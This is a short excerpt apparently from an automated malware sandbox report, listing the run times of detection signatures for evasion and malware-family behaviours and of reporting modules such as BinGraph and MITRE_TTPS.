    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_dns_blockchain
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 6.771 seconds )

    • 6.351 BinGraph
    • 0.359 MITRE_TTPS
    • 0.061 PCAP2CERT